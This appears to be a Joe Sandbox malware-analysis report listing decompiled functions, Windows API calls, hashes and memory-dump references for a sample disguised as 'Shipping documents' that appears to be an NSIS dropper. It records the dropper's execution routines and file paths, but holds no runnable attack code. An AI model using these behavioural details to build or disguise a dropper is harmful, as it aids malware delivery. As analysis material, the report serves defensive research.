Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
Instruction ID: 6de71dbe5e5d375af2ff60806ac132807507260846fa189ddd953f73e58556b8
Opcode Fuzzy Hash: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
Instruction Fuzzy Hash: 5EB092B5181201BADA919B10DD09F8A7B62ABA4702F028564B200640B0C7B214A0DB18

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
Instruction ID: 0f2f3f991563ac80fd27f5aa645e2e28db5cd0803139906cd9636725fed969f3
Opcode Fuzzy Hash: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
Instruction Fuzzy Hash: D2B01231240200BFEA214F00DE0AF067B21F7D0700F10C830B360780F183711460EB4C

Non-executed Functions

Function 0040441E Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404436
GetDlgItem.USER32(?,00000408), ref: 00404442
GlobalAlloc.KERNEL32(00000040,?), ref: 0040448A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044A3
SetWindowLongW.USER32(00000000,000000FC,Function_000058D0), ref: 004044BA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044D0
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044E2
SendMessageW.USER32(00000000,00001109,00000002), ref: 004044F5
SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404501
SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 00404513
DeleteObject.GDI32(00000000), ref: 00404516
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404544
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040454E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004045F9
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404623
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404639
GetWindowLongW.USER32(?,000000F0), ref: 00404668
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404675
ShowWindow.USER32(?,00000005), ref: 00404689
SendMessageW.USER32(?,00000419,00000000,?), ref: 004047C6
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404841
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404860
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040488C
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048C1
ImageList_Destroy.COMCTL32(00000000), ref: 004048E8
GlobalFree.KERNEL32(00000000), ref: 004048F8

Strings

M, xrefs: 004045E0

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
String ID: M
API String ID: 1688767230-3664761504
Opcode ID: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
Instruction ID: 0c70e663620b203d4295ddec51a1238c6828a203a6db769dd6a487d059f7c121
Opcode Fuzzy Hash: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
Instruction Fuzzy Hash: D812CEB1604301AFD7209F24DC85A6BB7E9EBC8314F104A3EFA95E72E1D7789C018B59

Function 00404085 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 281COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004040D6
SetWindowTextW.USER32(00000000,?), ref: 00404100

Part of subcall function 00406A3A: GetDlgItemTextW.USER32(?,?,00000400,00404F4C), ref: 00406A4D

Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DB2
Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DC6
Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DDE

Strings

perchlorination: Installing, xrefs: 004041A1, 00404200
Exec, xrefs: 00404205, 00404214
hB, xrefs: 0040425D
hB, xrefs: 004042D0
A, xrefs: 004041C3
hB, xrefs: 004042C8
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 004041F1

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Char$Next$ItemText$PrevWindow
String ID: A$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$Exec$hB$hB$hB$perchlorination: Installing
API String ID: 4089110348-2826575726
Opcode ID: 167ff9aaa94b94036ddb7a75038adbc32ec6751d602b2a794da5482718eacf52
Instruction ID: 78a62133d8830c36d5793369ed94498114b99b2b12e517e73a25645684f3fa2c
Opcode Fuzzy Hash: 167ff9aaa94b94036ddb7a75038adbc32ec6751d602b2a794da5482718eacf52
Instruction Fuzzy Hash: BD91BFB1704311ABD720AF658C81B6B76A8AF94744F41483EFB42B62D1D77CD9018BAE

Function 0040234F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409ADC,?,00000001,00409ABC,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8

Strings

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 0040241F
C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 004024AC

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer
API String ID: 542301482-58875899
Opcode ID: bc0662a52d98e10143171a3c355a99e9a72edb8270824da348fbf334a5ed34ad
Instruction ID: 400f91c807c924ebcba0c57f4558c7b9259f909ea30478445bd8bb36a2d5bedd
Opcode Fuzzy Hash: bc0662a52d98e10143171a3c355a99e9a72edb8270824da348fbf334a5ed34ad
Instruction Fuzzy Hash: 5E414C72604341AFC700DFA5C888A1BBBE9FF89315F14092EF655DB291DB79D805CB16

Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
Instruction ID: 4ed41b4626080909459e48417ffb7120e43efe1e52fe46e4786edeb33a661726
Opcode Fuzzy Hash: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
Instruction Fuzzy Hash: ADD0EC61414150A9D2606F71894DABA73ADAF45314F204A3EF156E50D1EAB85501973B

Function 004075FE Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
Instruction ID: 34855fb2682deb8042092b43f828aa3e625fb4f43d1e7d882369f70b8a17060e
Opcode Fuzzy Hash: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
Instruction Fuzzy Hash: 09F17171A183418FCB04CF18C49076ABBE5FF89315F14896EE889EB286D778E941CF56

Function 00406EA8 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
Instruction ID: 458c99329ba390570ae49b1fba58edefd6773494dbefaa897816e029df8d06ab
Opcode Fuzzy Hash: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
Instruction Fuzzy Hash: 11C16771A0C3458FC718DF28D580A6ABBE1BBC9304F148A3EE59997380D734E916CF96

Function 00403D8A Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,?,00000001), ref: 00403E29
EnableWindow.USER32(?), ref: 00403E36
GetDlgItem.USER32(?,000003E8), ref: 00403E42
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E5E
GetSysColor.USER32(?), ref: 00403E6F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E7D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E8B
lstrlenW.KERNEL32(?), ref: 00403E91
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E9E
SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EB5
GetDlgItem.USER32(?,0000040A), ref: 00403F11
SendMessageW.USER32(00000000), ref: 00403F18
EnableWindow.USER32(00000000), ref: 00403F35
GetDlgItem.USER32(0000004E,000003E8), ref: 00403F59
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FAE
LoadCursorW.USER32(00000000,00007F02), ref: 00403FC0
SetCursor.USER32(00000000), ref: 00403FC9

Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02

LoadCursorW.USER32(00000000,00007F00), ref: 0040400B
SetCursor.USER32(00000000), ref: 0040400E
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040403A
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404052

Strings

Exec, xrefs: 00403F8F
N, xrefs: 00403F45

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
String ID: Exec$N
API String ID: 3270077613-17853963
Opcode ID: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
Instruction ID: c65a3a36bb4725451a4dfe1d630424e4f24f9f71ba4400fdcb13afcf6ca1fe0a
Opcode Fuzzy Hash: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
Instruction Fuzzy Hash: A3817DB0604305AFD710AF25DC84A6B7BA9FF84744F01493EF641B62A1C778AD45CF5A

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
BeginPaint.USER32(?,?), ref: 0040104C
GetClientRect.USER32(?,?), ref: 00401062
CreateBrushIndirect.GDI32(00000000), ref: 004010DF
FillRect.USER32(00000000,?,00000000), ref: 004010F3
DeleteObject.GDI32(00000000), ref: 004010FA
CreateFontIndirectW.GDI32(?), ref: 00401120
SetBkMode.GDI32(00000000,00000001), ref: 00401143
SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
SelectObject.GDI32(00000000,00000000), ref: 0040115B
DrawTextW.USER32(00000000,00434A00,000000FF,?,00000820), ref: 00401171
SelectObject.GDI32(00000000,00000000), ref: 00401179
DeleteObject.GDI32(?), ref: 0040117F
EndPaint.USER32(?,?), ref: 0040118E

Strings

F, xrefs: 0040100A

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
Instruction ID: 3af209a9edb156689bef41e0a63d31b37659a4d6f6412c5d0cf3c0f243fc5647
Opcode Fuzzy Hash: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
Instruction Fuzzy Hash: E041AFB20083509FC7159F65CD4496BBBE9FF88715F140A2EF995A22A1C734DD04CFA5

Function 00406306 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,0040625E,?,?), ref: 00406341
GetShortPathNameW.KERNEL32(00000000,004319C0,00000400), ref: 0040634A
GetShortPathNameW.KERNEL32(?,004311C0,00000400), ref: 00406367
wsprintfA.USER32 ref: 00406385
GetFileSize.KERNEL32(00000000,00000000,004311C0,C0000000,00000004,004311C0,?), ref: 004063BD
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063CD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063FD
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00430DC0,00000000,-0000000A,00409984,00000000,[Rename],00000000,00000000,00000000), ref: 0040641D
GlobalFree.KERNEL32(00000000), ref: 0040642F
CloseHandle.KERNEL32(00000000), ref: 00406436

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

Strings

[Rename], xrefs: 004063E5, 004063F4
%ls=%ls, xrefs: 0040637B

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
